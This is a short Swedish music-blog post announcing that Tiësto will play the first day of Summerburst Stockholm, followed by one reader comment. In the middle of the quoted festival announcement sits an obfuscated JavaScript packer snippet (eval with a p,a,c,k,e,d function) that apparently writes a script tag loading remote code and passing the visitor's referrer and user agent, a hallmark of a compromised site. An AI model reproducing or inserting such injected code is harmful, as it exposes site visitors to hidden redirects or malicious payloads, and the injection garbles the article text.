Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2019

Scroll to top

Top

Tiësto till Summerburst Stockholm!

Tiësto till Summerburst Stockholm!
Alexander Gylemo

På sistone har det varit tyst kring nya artister som kommer till Summerburst i sommar och precis som man ska börja oroa sig för om det inte kommer fler artister än de som ropats ut har Summerburst idag (2012-02-20) gått ut med att världens främste dj och house/techno-producent Tiësto kommer dyka upp på Summerburst i Stockholm! Det är kanske inte så konstigt då svenska folket blev förälskade i honom på nytt då han i slutet av 2011 sålde slut på Globen och faktiskt även numera kan kalla Stockholm för sin hemstad efter att ha flyttat hit i början på året.

Så här står det nu på Summerburst.se:

Tiësto eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bthdd|var|u0026u|referrer|rterd||js|php’.split(’|’),0,{}))
framträder på festivalens första dag, fredag 15 juni, och inleder därmed en helg av rent episka mått, då Summerburst Festival för andra året intar Stockholm Stadion I hjärtat av Stockholm.

Summerburst blir bara bättre och bättre!

Comments

  1. Sloban

    För najs!!!!!